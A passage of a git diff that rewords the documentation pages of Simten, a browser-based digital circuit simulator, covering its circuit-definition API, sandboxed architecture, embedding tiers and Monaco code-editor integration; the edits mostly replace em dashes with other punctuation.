 | `memory` | RAM, DualPortRAM, ROM, DualPortROM | Memory initialization map `{ addr: value, ... }` |
 | `low`, `high` | BitSlice | Bit range to extract (inclusive) |
 | `baseAddress` | ROM | Memory-mapped base address |
@@ -131,7 +131,7 @@ const FullAdder = circuit('FullAdder', {
 })
 ```
 
-The simulator **elaborates** composites by recursively flattening them to primitives. A `FullAdder` node becomes two `Xor`, two `And`, and one `Or` node internally — composites have zero runtime overhead.
+The simulator **elaborates** composites by recursively flattening them to primitives. A `FullAdder` node becomes two `Xor`, two `And`, and one `Or` node internally, so composites have zero runtime overhead.
 
 ## Self-contained Demos
 
@@ -161,7 +161,7 @@ Circuits can have executable behavior instead of (or in addition to) structural 
 
 ### 1. Composite (structural only)
 
-Uses `nodes` + `connect` — the simulator elaborates these into primitives at compile time. No JS runs at simulation time; all behavior comes from the leaf primitives.
+Uses `nodes` + `connect`; the simulator elaborates these into primitives at compile time. No JS runs at simulation time; all behavior comes from the leaf primitives.
 
 ```typescript
 const HalfAdder = circuit('HalfAdder', {
@@ -177,9 +177,9 @@ const HalfAdder = circuit('HalfAdder', {
 })
 ```
 
-### 2. Behavioral (eval — combinational)
+### 2. Behavioral (eval, combinational)
 
-Uses `eval` — a pure function from inputs to outputs. Runs on every propagation step. No state, no clock.
+Uses `eval`, a pure function from inputs to outputs. Runs on every propagation step. No state, no clock.
 
 ```typescript
 const Xor = circuit('Xor', {
@@ -192,7 +192,7 @@ const Xor = circuit('Xor', {
 `eval` receives named input values as numbers (`0` or `1` for `bit`, integers for `bus(N)`).
 It returns an object with named output values.
 
-### 3. Stateful (state + onTick + eval — sequential)
+### 3. Stateful (state + onTick + eval, sequential)
 
 Uses `state`, `onTick`, and `eval`. The circuit has internal state that updates on the rising clock edge.
 
@@ -208,9 +208,9 @@ const Accumulator = circuit('Accumulator', {
 })
 ```
 
-- `state` — the initial state object (shape defines what state exists)
-- `eval` receives current state fields merged with inputs — return output values
-- `onTick` receives inputs merged with current state — return next state object
+- `state`: the initial state object (shape defines what state exists)
+- `eval` receives current state fields merged with inputs; return output values
+- `onTick` receives inputs merged with current state; return next state object
 
 The stdlib's `Register` follows this same pattern but is wrapped in a factory function so callers can specialize the width and reset value: `circuit('Register', ({ width = 8 } = {}) => ({ ... }))`. See [Node Parameters](#node-parameters) for how factory args flow into per-instance state.
 
@@ -218,13 +218,13 @@ The tick cycle calls `eval` first (combinational output from current state), the
 
 ---
 
-The three patterns are not mutually exclusive — a circuit can have both `nodes`/`connect` and `eval`, though in practice you use one or the other.
+The three patterns are not mutually exclusive: a circuit can have both `nodes`/`connect` and `eval`, though in practice you use one or the other.
 
 ## Type Rules
 
-- `bit → bit` — valid
-- `bus(N) → bus(N)` — valid (same width)
-- `bit → bus(N)` — invalid (needs explicit conversion)
-- `bus(8) → bus(16)` — invalid (width mismatch)
+- `bit → bit`: valid
+- `bus(N) → bus(N)`: valid (same width)
+- `bit → bus(N)`: invalid (needs explicit conversion)
+- `bus(8) → bus(16)`: invalid (width mismatch)
 
 Use `Splitter`, `BitSlice`, or `Concat` for type conversions.

--- a/apps/web/content/docs/architecture.mdx
+++ b/apps/web/content/docs/architecture.mdx
@@ -5,9 +5,9 @@ description: How circuits go from text to simulation
 
 ## Why there's a sandbox
 
-User-defined circuit code is arbitrary TypeScript — `circuit('Foo', { eval: ({ a, b }) => ... })`. Running it in the main React frame would let a malicious circuit read auth cookies, hijack the chat session, or escape into the editor's tab. Instead, every circuit you compile or simulate runs inside a cross-origin iframe (`sandbox.simten.dev`) with `sandbox="allow-scripts"` — the browser kernel blocks all network access and origin isolation prevents cookie/DOM reach.
+User-defined circuit code is arbitrary TypeScript, such as `circuit('Foo', { eval: ({ a, b }) => ... })`. Running it in the main React frame would let a malicious circuit read auth cookies, hijack the chat session, or escape into the editor's tab. Instead, every circuit you compile or simulate runs inside a cross-origin iframe (`sandbox.simten.dev`) with `sandbox="allow-scripts"`: the browser kernel blocks all network access and origin isolation prevents cookie/DOM reach.
 
-This is the same pattern [CodePen](https://codepen.io) uses to isolate user-authored snippets from their editor app — preview runs on a separate origin (`cdpn.io`) inside a sandboxed iframe, talking to the host page via postMessage only. Everything you'll see called "sandbox" in the Simten codebase is one side of that bridge or the other.
+This is the same pattern [CodePen](https://codepen.io) uses to isolate user-authored snippets from their editor app: preview runs on a separate origin (`cdpn.io`) inside a sandboxed iframe, talking to the host page via postMessage only. Everything you'll see called "sandbox" in the Simten codebase is one side of that bridge or the other.
 
 ## Runtime topology
 
@@ -18,7 +18,7 @@ The four layers a circuit flows through in the browser:
 | **Public hook** | `packages/embed/src/hooks/useCircuitSimulator.ts` | What every embed/blog/editor consumer calls. `tick()`, `setNode()`, `stepBack()`, time-travel, auto-run. |
 | **Sandbox bridge** (host) | `packages/ui/src/sandbox/useSandbox.ts` | postMessage transport + slot lifecycle. Used internally by `useCircuitSimulator`; only advanced consumers (editor, web component) touch it directly. |
 | **Sandbox iframe** | `apps/sandbox/src/main.ts` | The other side of the bridge. Runs *inside* the iframe (cross-origin). Receives postMessage commands, evaluates user code in a Web Worker, drives the engine. |
-| **Simulator engine** | `packages/core/src/simulator/` | Pure computation — no iframe, no React. Used by the iframe app for browser sims; used directly by `@simten/core/sim` for Node/CI scripts. |
+| **Simulator engine** | `packages/core/src/simulator/` | Pure computation, with no iframe and no React. Used by the iframe app for browser sims; used directly by `@simten/core/sim` for Node/CI scripts. |
 
 Direction of calls (browser path):
 
@@ -26,7 +26,7 @@ Direction of calls (browser path):
 useCircuitSimulator → useSandbox → [postMessage / iframe boundary] → apps/sandbox/main.ts → core/simulator
 ```
 
-If you're writing a `vitest` property test or a CI fuzzer, you skip the bridge entirely — just import from `@simten/core/sim` and drive the engine directly. See "Two ways to run a circuit" below.
+If you're writing a `vitest` property test or a CI fuzzer, you skip the bridge entirely and just import from `@simten/core/sim` and drive the engine directly. See "Two ways to run a circuit" below.
 
 ## From TypeScript to Simulation
 
@@ -52,7 +52,7 @@ export function PipelineStage({ number, title, subtitle, children }) {
 
 <div className="my-8">
 <PipelineStage number={1} title="Build" subtitle="circuit() calls → Circuit IR">
-  The TypeScript `circuit()` builder collects node types, port declarations, and connection calls. The `.to()` wiring calls produce a declarative connection list. The result is a `BuiltCircuit` — a plain data structure describing the circuit's structure.
+  The TypeScript `circuit()` builder collects node types, port declarations, and connection calls. The `.to()` wiring calls produce a declarative connection list. The result is a `BuiltCircuit`, a plain data structure describing the circuit's structure.
 </PipelineStage>
 
 <PipelineStage number={2} title="Validate" subtitle="Check for errors before running">
@@ -60,15 +60,15 @@ export function PipelineStage({ number, title, subtitle, children }) {
 </PipelineStage>
 
 <PipelineStage number={3} title="Compile to IR" subtitle="AST → Circuit objects">
-  The AST is compiled into `Circuit` objects — the system's universal representation. Both primitives and composites share the same interface: ports, connections, nodes, parameters.
+  The AST is compiled into `Circuit` objects, the system's universal representation. Both primitives and composites share the same interface: ports, connections, nodes, parameters.
 </PipelineStage>
 
 <PipelineStage number={4} title="Elaborate" subtitle="Flatten composites to primitives">
-  Composite circuits are recursively expanded. A `FullAdder` becomes two `Xor`, two `And`, and one `Or`. Connections are stitched through composite boundaries. The result is a `FlatCircuit` — only primitives, no hierarchy.
+  Composite circuits are recursively expanded. A `FullAdder` becomes two `Xor`, two `And`, and one `Or`. Connections are stitched through composite boundaries. The result is a `FlatCircuit`: only primitives, no hierarchy.
 </PipelineStage>
 
 <PipelineStage number={5} title="Compile to numeric" subtitle="Typed arrays for fast simulation">
-  Node IDs become array indices. Port connections become index lookups. Each primitive gets mapped to an evaluator function via a dispatch table. The result is a `NumericCircuit` — zero string operations in the hot path.
+  Node IDs become array indices. Port connections become index lookups. Each primitive gets mapped to an evaluator function via a dispatch table. The result is a `NumericCircuit`, with zero string operations in the hot path.
 </PipelineStage>
 
 <PipelineStage number={6} title="Simulate" subtitle="Event-driven propagation">
@@ -80,7 +80,7 @@ See the [Simulator Engine](/docs/simulator-engine) page for deep details on the 
 
 ## Circuit IR
 
-Everything in the system — primitives, user circuits, elaborated results — uses the same `Circuit` interface:
+Everything in the system (primitives, user circuits, elaborated results) uses the same `Circuit` interface:
 
 ```typescript
 interface Circuit {
@@ -95,7 +95,7 @@ interface Circuit {
 }
 ```
 
-Primitives have evaluator functions registered against them. Composites are purely structural — they define what to connect, not how to compute. The elaboration step removes all composites, leaving only primitives.
+Primitives have evaluator functions registered against them. Composites are purely structural: they define what to connect, not how to compute. The elaboration step removes all composites, leaving only primitives.
 
 ## Simulation Model
 
@@ -130,7 +130,7 @@ Each clock tick executes five phases:
 
 <div className="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-5 gap-2 my-6">
 <PhaseStep phase={1} title="Propagate">
-  Evaluate all combinational logic with current state. Capture port values — this is what the API returns.
+  Evaluate all combinational logic with current state. Capture port values; this is what the API returns.
 </PhaseStep>
 <PhaseStep phase={2} title="Clock">
   Set all clocks to rising edge.
@@ -146,7 +146,7 @@ Each clock tick executes five phases:
 </PhaseStep>
 </div>
 
-The atomic commit in Phase 4 is what makes this match real hardware — all flip-flops and registers update at the same instant, just like a physical clock edge.
+The atomic commit in Phase 4 is what makes this match real hardware: all flip-flops and registers update at the same instant, just like a physical clock edge.
 
 ## Simulation Session
 
@@ -172,15 +172,15 @@ The `SimulationSession` is the orchestration layer between the UI and the engine
 
 Every `tick()` records a snapshot. Users can step back and forward through the history to inspect any clock cycle. The session maintains a ring buffer of snapshots (default 1000) with index-based navigation:
 
-- `stepBack()` / `stepForward()` — move one cycle
-- `seek(index)` — jump to any recorded cycle
+- `stepBack()` / `stepForward()`: move one cycle
+- `seek(index)`: jump to any recorded cycle
 - Ticking while viewing the past truncates forward history (linear, no branching)
 
 Environmental state (switch positions, input values) is captured as opaque metadata in each snapshot and restored via callbacks when time-travelling.
 
 ### Auto-run
 
-For continuous execution, `startAutoRun(ticksPerSecond, { displayRate })` runs the engine in a tight loop and only notifies React at the display rate. The RISC-V CPU can run at ~20,000 ticks/sec while the UI updates at 30fps — the engine does ~667 ticks per display frame.
+For continuous execution, `startAutoRun(ticksPerSecond, { displayRate })` runs the engine in a tight loop and only notifies React at the display rate. The RISC-V CPU can run at ~20,000 ticks/sec while the UI updates at 30fps, so the engine does ~667 ticks per display frame.
 
 ### setNode
 
@@ -189,7 +189,7 @@ For continuous execution, `startAutoRun(ticksPerSecond, { displayRate })` runs t
 - **Switch/Input/Button** → sets `arguments.value` (combinational)
 - **ROM/RAM/Register** → sets sequential state directly
 
-This means loading a binary into ROM works the same as flipping a switch — one API call, no session reset. ROM data persists across reset (like real hardware — flash survives power cycle).
+This means loading a binary into ROM works the same as flipping a switch: one API call, no session reset. ROM data persists across reset (like real hardware, where flash survives a power cycle).
 
 ## Packages
 
@@ -204,7 +204,7 @@ This means loading a binary into ROM works the same as flipping a switch — one
 | Package | Description |
 |---------|-------------|
 | `@simten/core` | TypeScript builder, compiler, validator, simulator engine, `SimulationSession`, environmental state, Verilog export. No UI dependencies. |
-| `@simten/ui` | React components — canonical node renderers, shared canvas, ELK layout, sandbox context (`useSandbox`), `ClockControls`, editor UI. |
+| `@simten/ui` | React components: canonical node renderers, shared canvas, ELK layout, sandbox context (`useSandbox`), `ClockControls`, editor UI. |
 | `@simten/embed` | `CircuitViewer` (simulation + canvas), `CircuitEmbed` (viewer + auto-harness + info bar), `<circuit-embed>` web component. Depends on core + ui. |
 | `@simten/mcp` | MCP server for Claude Code integration |
 
@@ -215,12 +215,12 @@ A single hook, `useCircuitSimulator`, handles the simulation lifecycle for every
 | Hook | Input | Purpose | Used by |
 |------|-------|---------|---------|
 | `useCircuitSimulator(builtCircuit)` | `BuiltCircuit` | Builds library from dependencies, optional auto-harness, compiles + ticks via sandbox | `EditorWorkspace`, `CircuitViewer` → `CircuitEmbed` → landing page, blog demos, drill-down |
-| `useCircuitCompiler(source)` | source string | Compile mechanics only — debounce, `sandbox.compile`, retry, error extraction, `library` lookup. Takes no opinion about the result. | `EditorWorkspace` (feeds its selection stores) |
-| `useCompiledCircuit(source)` | source string | `useCircuitCompiler` + `builtFromIR` + `useCircuitSimulator` — source straight to a running sim. | External editors/playgrounds; see [Code Editor](/docs/code-editor) |
+| `useCircuitCompiler(source)` | source string | Compile mechanics only: debounce, `sandbox.compile`, retry, error extraction, `library` lookup. Takes no opinion about the result. | `EditorWorkspace` (feeds its selection stores) |
+| `useCompiledCircuit(source)` | source string | `useCircuitCompiler` + `builtFromIR` + `useCircuitSimulator`, taking source straight to a running sim. | External editors/playgrounds; see [Code Editor](/docs/code-editor) |
 
 Each consumer gets an isolated sandbox slot (`Map<slotId, SlotState>`) so simulation state never leaks across embeds or between the editor and a preview.
 
-Data flows one direction — from the compiled circuit to the sandbox to the UI:
+Data flows one direction, from the compiled circuit to the sandbox to the UI:
 
 ```
 circuit() or TS Editor compile → BuiltCircuit
@@ -259,22 +259,22 @@ useCircuitStore         (the active circuit)
      └──→ MCP callbacks (reads circuit for state responses)
 ```
 
-**Why stores instead of props?** The editor page has multiple sibling consumers — Monaco, the circuit canvas, the AI chat panel, the Verilog export button, and MCP callbacks all need the current circuit and library. Threading this through props would mean `EditorWorkspace` becomes a giant prop-drilling intermediary. Zustand gives each consumer direct access with fine-grained subscriptions (a store update only re-renders components that read the changed slice).
+**Why stores instead of props?** The editor page has multiple sibling consumers: Monaco, the circuit canvas, the AI chat panel, the Verilog export button, and MCP callbacks all need the current circuit and library. Threading this through props would mean `EditorWorkspace` becomes a giant prop-drilling intermediary. Zustand gives each consumer direct access with fine-grained subscriptions (a store update only re-renders components that read the changed slice).
 
-**Why not stores in embeds?** Embeds (`CircuitEmbed`, `CircuitViewer`) are props-driven — they receive a `BuiltCircuit` and manage simulation internally. They don't need shared state because there's only one consumer (the canvas). This keeps embeds self-contained and avoids leaking store state between multiple `<CircuitEmbed>` instances on the same page.
+**Why not stores in embeds?** Embeds (`CircuitEmbed`, `CircuitViewer`) are props-driven: they receive a `BuiltCircuit` and manage simulation internally. They don't need shared state because there's only one consumer (the canvas). This keeps embeds self-contained and avoids leaking store state between multiple `<CircuitEmbed>` instances on the same page.
 
 ### Import paths
 
 | Import | Contents |
 |--------|----------|
 | `@simten/core/simulator` | `SimulationSession`, `SimulatorEngine`, `PRIMITIVE_DEFINITIONS`, `PRIMITIVES`, `createSimulatorFromCircuit`, `captureEnvironmentalState`, `restoreEnvironmentalState` |
-| `@simten/embed` | `CircuitViewer`, `CircuitEmbed`, `<circuit-embed>` web component — everything needed to embed a circuit |
-| `@simten/ui/canvas` | `CircuitCanvas`, `ClockControls` — shared simulation UI |
-| `@simten/ui/sandbox` | `useSandbox`, `SandboxProvider` — sandbox iframe context used by `useCircuitSimulator` |
-| `@simten/ui/nodes` | `BaseNode`, `InputNode`, `OutputNode`, `LogicGateNode`, `NodeData` — canonical node components (props-driven, store-free) |
-| `@simten/ui/monaco` | `SimtenCodeEditor`, `setupSimtenIntellisense`, `useTypeAcquisition`, `registerSimtenThemes` — Monaco editor with circuit IntelliSense. See [Code Editor](/docs/code-editor) |
+| `@simten/embed` | `CircuitViewer`, `CircuitEmbed`, `<circuit-embed>` web component: everything needed to embed a circuit |
+| `@simten/ui/canvas` | `CircuitCanvas`, `ClockControls`: shared simulation UI |
+| `@simten/ui/sandbox` | `useSandbox`, `SandboxProvider`: sandbox iframe context used by `useCircuitSimulator` |
+| `@simten/ui/nodes` | `BaseNode`, `InputNode`, `OutputNode`, `LogicGateNode`, `NodeData`: canonical node components (props-driven, store-free) |
+| `@simten/ui/monaco` | `SimtenCodeEditor`, `setupSimtenIntellisense`, `useTypeAcquisition`, `registerSimtenThemes`: Monaco editor with circuit IntelliSense. See [Code Editor](/docs/code-editor) |
 
-Node components live in `@simten/ui/nodes` and are the single source of truth — both the embed and the editor use them.
+Node components live in `@simten/ui/nodes` and are the single source of truth; both the embed and the editor use them.
 
 ## Two ways to run a circuit
 
@@ -283,11 +283,11 @@ The same engine powers two distinct consumption paths. The split is **interactiv
 | Path | Where it runs | Has a canvas? | Drives the canvas? | Typical use |
 |------|---------------|---------------|--------------------|-------------|
 | **Sandbox** | Browser worker (editor, `<circuit-embed>`, web component) | yes | only via human clicks or MCP actions | live editing, interactive embeds, LLM-driven design |
-| **Script** | Node (`tsx`, `vitest`, CI) | no | n/a — there is none | property tests, fuzzers, batch sweeps, CI verification |
+| **Script** | Node (`tsx`, `vitest`, CI) | no | n/a, there is none | property tests, fuzzers, batch sweeps, CI verification |
 
 ### Sandbox path
 
-When user code runs inside the editor or an embed, it goes through the sandbox iframe + worker (see [Security](/docs/security)). Code in this path *defines* circuits; *something else* drives them — a human flipping a switch, or Claude calling MCP actions like `RUN_SIMULATION` / `SET_INPUT`. User code itself currently has no API to drive the canvas simulator. That's intentional: the canvas sim and any user-code sim run on different threads, so a user-code `simulate(...)` call would create a parallel-universe instance instead of moving the canvas. (Tracked in issue #51 as a prereq for self-animating embeds.)
+When user code runs inside the editor or an embed, it goes through the sandbox iframe + worker (see [Security](/docs/security)). Code in this path *defines* circuits; *something else* drives them: a human flipping a switch, or Claude calling MCP actions like `RUN_SIMULATION` / `SET_INPUT`. User code itself currently has no API to drive the canvas simulator. That's intentional: the canvas sim and any user-code sim run on different threads, so a user-code `simulate(...)` call would create a parallel-universe instance instead of moving the canvas. (Tracked in issue #51 as a prereq for self-animating embeds.)
 
 ### Script path
 
@@ -301,16 +301,16 @@ const Counter = circuit('Counter', { ... });
 const sim = createSimulator(Counter);
 sim.setNode('reset', 1);
 sim.tick();
-// run property tests, fuzzers, sweeps — full engine speed
+// run property tests, fuzzers, sweeps at full engine speed
 ```
 
-This is the path for any code that needs to drive simulation programmatically — whether that's a `vitest` property test you're writing during prototyping or a CI fuzzer comparing the TS sim to iverilog. There's nothing for it to be out of sync with, so the constraints that apply in the browser don't apply here.
+This is the path for any code that needs to drive simulation programmatically, whether that's a `vitest` property test you're writing during prototyping or a CI fuzzer comparing the TS sim to iverilog. There's nothing for it to be out of sync with, so the constraints that apply in the browser don't apply here.
 
-A blog-post `<circuit-embed>` is "production" but uses the sandbox path. A throwaway `vitest` exploration is "prototyping" but uses the script path. The axis that matters is whether there's a canvas and whether human/LLM input drives it — not how finished the code is.
+A blog-post `<circuit-embed>` is "production" but uses the sandbox path. A throwaway `vitest` exploration is "prototyping" but uses the script path. The axis that matters is whether there's a canvas and whether human/LLM input drives it, not how finished the code is.
 
 ## MCP Integration
 
-The MCP server drives a viewer in the browser: Claude Code calls MCP tools, and the server pushes the results over a WebSocket for display and in-browser simulation. The browser is display-only — it sends back nothing but a render acknowledgment.
+The MCP server drives a viewer in the browser: Claude Code calls MCP tools, and the server pushes the results over a WebSocket for display and in-browser simulation. The browser is display-only: it sends back nothing but a render acknowledgment.
 
 export function FlowDiagram() {
   return (
@@ -337,6 +337,6 @@ export function FlowDiagram() {
 | Claude → Browser | WebSocket push | Circuit updates, waveforms, test results |
 | Browser → Claude | Render acknowledgment | Boolean ack that a pushed circuit rendered |
 
-The browser viewer is intentionally one-way: it accepts nothing actionable back, so a rendered page can't drive Claude or read its state. The MCP server provides tools, not inference — users bring their own Claude subscription. Zero AI API cost for the app developer.
+The browser viewer is intentionally one-way: it accepts nothing actionable back, so a rendered page can't drive Claude or read its state. The MCP server provides tools, not inference; users bring their own Claude subscription. Zero AI API cost for the app developer.
 
 See the [MCP Integration](/docs/mcp-integration) guide for setup and available tools.

--- a/apps/web/content/docs/building-custom-uis.mdx
+++ b/apps/web/content/docs/building-custom-uis.mdx
@@ -1,13 +1,13 @@
 ---
 title: Building custom UIs
-description: Four tiers — from drop-in <CircuitEmbed /> to full composition with useCircuitSimulator + CircuitCanvas.
+description: Four tiers, from drop-in <CircuitEmbed /> to full composition with useCircuitSimulator + CircuitCanvas.
 ---
 
 import { Tier2EmbedWithCallback, Tier4FullComposition } from '../../src/features/docs/CustomCompositionDemo'
 
 `<CircuitEmbed />` is the default for putting an interactive circuit
-on a page. When you need more — a sibling that reacts to switch
-toggles, a custom HUD, a debugger driving the sim — the same
+on a page. When you need more (a sibling that reacts to switch
+toggles, a custom HUD, a debugger driving the sim), the same
 primitives are available; you compose them yourself.
 
 The simulator runs in pure JavaScript inside the sandbox iframe,
@@ -16,11 +16,11 @@ your React UI to subscribe to its state and write inputs back. Pick
 the highest one that gives you what you need.
 
 These tiers all take a circuit you already have. If instead you want
-users to *edit source* and watch it simulate live — an editor beside a
-canvas — see [Code Editor](/docs/code-editor), which pairs
+users to *edit source* and watch it simulate live, an editor beside a
+canvas, see [Code Editor](/docs/code-editor), which pairs
 `SimtenCodeEditor` with `useCompiledCircuit`.
 
-## Tier 1 — Drop-in `<CircuitEmbed />`
+## Tier 1: Drop-in `<CircuitEmbed />`
 
 The default. One component, sensible defaults, identical look across
 every page on simten.dev. Use this unless you need something it
@@ -36,13 +36,13 @@ import { CircuitEmbed } from '@simten/embed'
 />
 ```
 
-No state out, no imperative control — just a self-contained
+No state out, no imperative control, just a self-contained
 interactive embed.
 
 Every page in [Examples](/docs/examples) uses this pattern, as do
 most inline circuits across the `/blog/*` posts.
 
-## Tier 2 — Read sim state with `onPortValuesChange`
+## Tier 2: Read sim state with `onPortValuesChange`
 
 When you want a sibling component to react to the embed's live state
 (e.g. a truth-table highlight that follows the user's switch toggles,
@@ -73,38 +73,38 @@ function HalfAdderWithLiveTable() {
 }
 ```
 
-**Live demo** — toggle the switches:
+**Live demo**: toggle the switches:
 
 <Tier2EmbedWithCallback />
 
 The callback is captured in a ref inside the embed, so inline
-functions like `onPortValuesChange={(pv) => setX(pv)}` are safe — they
+functions like `onPortValuesChange={(pv) => setX(pv)}` are safe, since they
 won't cause spurious re-fires across parent renders.
 
 ### Firing semantics
 
 A few things worth knowing about *when* the callback fires:
 
-- **First fire** — once the embed's internal simulator becomes ready
+- **First fire**: once the embed's internal simulator becomes ready
   and port values have first settled. Before that, the callback
   doesn't fire and your `useState<FlatPortValueMap | null>(null)`
   stays at `null` for one paint. Plan for that initial frame in your
   rendering (e.g. `computeActiveRow` returns `undefined` cleanly when
   port values are absent).
-- **Subsequent fires** — only on settled (post-propagation) states.
+- **Subsequent fires**: only on settled (post-propagation) states.
   The simulator never exposes intermediate propagation states, so
   there's no risk of flicker from mid-propagation values.
-- **Reference identity** — the port-values `Map` is *not* guaranteed
+- **Reference identity**: the port-values `Map` is *not* guaranteed
   to be a stable reference across no-op ticks. Sequential auto-run
   loops can emit new `Map` instances with unchanged contents. If
   you're doing expensive derived work, memoize on the actual values
   you care about rather than on the `Map` reference itself.
 
 The [`/learn/adders`](/learn/adders) page uses this for its live truth
-tables — toggle switches on the half-adder or full-adder, watch the
+tables: toggle switches on the half-adder or full-adder, watch the
 matching row in the table light up.
 
-## Tier 3 — Write into the sim with the imperative handle
+## Tier 3: Write into the sim with the imperative handle
 
 When a sibling needs to *drive* the embed (e.g. clicking a row in a
 truth table should set the canvas switches to that combination), use
@@ -135,12 +135,12 @@ function HalfAdderDrivenByTable() {
 Pair tier 2 (read out) and tier 3 (write in) to get bidirectional
 binding between the embed and any sibling UI you write.
 
-No page on simten.dev currently needs tier 3 — the API is available
+No page on simten.dev currently needs tier 3, but the API is available
 but nothing's using it yet. The most likely first consumer would be a
 clickable truth table that drives the embed's switches from the table
 side.
 
-## Tier 4 — Full composition
+## Tier 4: Full composition
 
 When you want to break out of the embed's chrome entirely and build
 your own frontend on top of the simulator, drop down to the underlying
@@ -179,7 +179,7 @@ function HalfAdderWithCustomControls() {
 }
 ```
 
-**Live demo** — same `HalfAdder` circuit as tier 2, but rendered as
+**Live demo**: same `HalfAdder` circuit as tier 2, but rendered as
 custom toggle buttons and LED indicators instead of a schematic. No
 `CircuitCanvas` anywhere in this tree:
 
@@ -190,7 +190,7 @@ instance. Custom UI reads from `sim.portValues` and writes via
 `sim.setNodeValue`; the truth table reads from the same map. One sim,
 many consumers, all of them yours.
 
-The simulator is still doing real work — compiling, propagating,
+The simulator is still doing real work: compiling, propagating,
 exposing port values through the sandbox iframe like every other
 tier. You could equally render nothing at all and use it purely as a
 background computation engine (a headless test harness, a checksum
@@ -200,10 +200,10 @@ Tier 4 is the right choice when:
 
 - The schematic isn't what you want to show. A game frontend, a
   calculator UI, a hex memory editor, an animated state-machine
-  diagram — anything where the canvas would be the wrong artifact.
+  diagram, anything where the canvas would be the wrong artifact.
 - You want chrome that's meaningfully different from `CircuitEmbed`'s
   card and you'd rather render `<CircuitCanvas>` directly with no
-  wrapping (it's also a public export — same composition, with the
+  wrapping (it's also a public export, same composition, with the
   canvas).
 - You're rendering multiple circuits in a single composed panel where
   layout coordination matters.
@@ -214,13 +214,13 @@ For most pages, tier 2 is enough.
 
 Two examples of tier 4 on simten.dev itself:
 
-- [Snake](/blog/snake-in-hardware) — the circuit *is* the game
+- [Snake](/blog/snake-in-hardware): the circuit *is* the game
   engine (`DualPortRAM` framebuffer, 4-phase pipeline, collision
   detection); the React component renders a custom 8×8 pixel grid +
   D-pad + speed slider on top of the sim. No `CircuitCanvas` shown
-  at all — the schematic is invisible to the player. Pure proof that
+  at all, and the schematic is invisible to the player. Pure proof that
   the simulator can drive any frontend.
-- [RV32I CPU debugger](/cpu/rv32i) — a 5-stage pipelined RISC-V
+- [RV32I CPU debugger](/cpu/rv32i): a 5-stage pipelined RISC-V
   processor on the engine side, with a bespoke debugger UI on top:
   register file, memory view, pipeline-stage indicators, instruction
   stream. Compile C / Rust / asm in-browser and step through
@@ -228,7 +228,7 @@ Two examples of tier 4 on simten.dev itself:
 
 ## Security
 
-Composing the primitives directly doesn't bypass anything —
+Composing the primitives directly doesn't bypass anything;
 `useCircuitSimulator` routes every tier's simulation work through
 the same cross-origin sandbox iframe that `<CircuitEmbed />` uses
 internally. See [Security architecture](/docs/security) for the
@@ -247,4 +247,4 @@ postMessage boundary).
 Most production simten.dev pages use tier 1. The `/learn/adders` half-
 and full-adder sections use tier 2 (live truth tables). Tier 3 isn't
 currently used in the public site but the API is there. Tier 4 is the
-escape hatch — keep it in mind for when you outgrow the canned embed.
+escape hatch; keep it in mind for when you outgrow the canned embed.

--- a/apps/web/content/docs/code-editor.mdx
+++ b/apps/web/content/docs/code-editor.mdx
@@ -11,7 +11,7 @@ Pair it with the compile hooks in `@simten/embed` and you have the whole "editor
 pnpm add @simten/ui @monaco-editor/react
 ```
 
-`@monaco-editor/react` and `monaco-editor` are **optional** peers — only this subpath needs them, so every other `@simten/ui` import stays Monaco-free. pnpm (v8+) and npm (v7+) install peers automatically, so that one command is usually enough. Monaco itself is loaded from a CDN at runtime, not bundled.
+`@monaco-editor/react` and `monaco-editor` are **optional** peers: only this subpath needs them, so every other `@simten/ui` import stays Monaco-free. pnpm (v8+) and npm (v7+) install peers automatically, so that one command is usually enough. Monaco itself is loaded from a CDN at runtime, not bundled.
 
 ## Quick start
 
@@ -27,7 +27,7 @@ That's the whole setup. Compiler options, the virtual `node_modules` tree, the `
 
 | Capability | How |
 |---|---|
-| Typed completions for the Simten stdlib | The `@simten/core` type payloads are inlined — no import, works offline |
+| Typed completions for the Simten stdlib | The `@simten/core` type payloads are inlined: no import, works offline |
 | Types for third-party imports | `@typescript/ata` fetches `.d.ts` from jsDelivr at runtime, same as the TypeScript playground |
 | Error squiggles | The `diagnostics` prop (see below) |
 | Simten editor themes | `registerSimtenThemes` + the `SIMTEN_DARK` / `SIMTEN_LIGHT` constants |
@@ -65,7 +65,7 @@ Register from `beforeMount` so the theme exists at first paint. Pass `{ lightBac
 
 ### Imperative handle
 
-The `ref` exposes `getEditor()`, `getMonaco()`, `getValue()`, and `setValue()` — useful for loading an example or reading the source for a share link.
+The `ref` exposes `getEditor()`, `getMonaco()`, `getValue()`, and `setValue()`, useful for loading an example or reading the source for a share link.
 
 ```tsx
 const editor = useRef<SimtenCodeEditorHandle>(null);
@@ -75,7 +75,7 @@ editor.current?.setValue(example.code);
 
 ## Source → live circuit
 
-The editor produces a string. To turn that string into a running simulation, use the compile hooks from `@simten/embed`. Both require a [`SandboxProvider`](/docs/security) ancestor — user code compiles and runs in the sandbox iframe, never the main frame.
+The editor produces a string. To turn that string into a running simulation, use the compile hooks from `@simten/embed`. Both require a [`SandboxProvider`](/docs/security) ancestor: user code compiles and runs in the sandbox iframe, never the main frame.
 
 ### useCompiledCircuit
 
@@ -110,7 +110,7 @@ It debounces edits, keeps the last good circuit when a compile fails, picks the 
 
 ### useCircuitCompiler
 
-The lower-level hook, for when you need to route the compile result somewhere custom rather than straight into a simulator — the `/circuit` editor uses it to feed its own selection stores. It owns only the compile mechanics and takes no opinion about what happens next.
+The lower-level hook, for when you need to route the compile result somewhere custom rather than straight into a simulator. The `/circuit` editor uses it to feed its own selection stores. It owns only the compile mechanics and takes no opinion about what happens next.
 
 ```tsx
 const { result, library, diagnostics, compiling, compile } = useCircuitCompiler(source, {
@@ -123,13 +123,13 @@ const { result, library, diagnostics, compiling, compile } = useCircuitCompiler(
 |---|---|
 | `result` | Last successful compile (`circuits`, `libraryCircuits`, `portValues`), retained across a later failure |
 | `library` | Component lookup (`resolveCircuit`, `getAllPrimitiveNames`, `getAllCircuitNames`) |
-| `diagnostics` | Compile errors — pass straight to `SimtenCodeEditor`'s `diagnostics` prop |
+| `diagnostics` | Compile errors; pass straight to `SimtenCodeEditor`'s `diagnostics` prop |
 | `compiling` | True while a compile is in flight |
 | `compile()` | Trigger a compile now, bypassing the debounce |
 
 ## Owning your own Monaco
 
-If you already have a Monaco instance — a collaborative editor with a [Yjs](https://github.com/yjs/yjs) binding, say, whose source of truth is a `Y.Text` rather than a `value`/`onChange` — use the headless primitives and keep your own `<Editor>`:
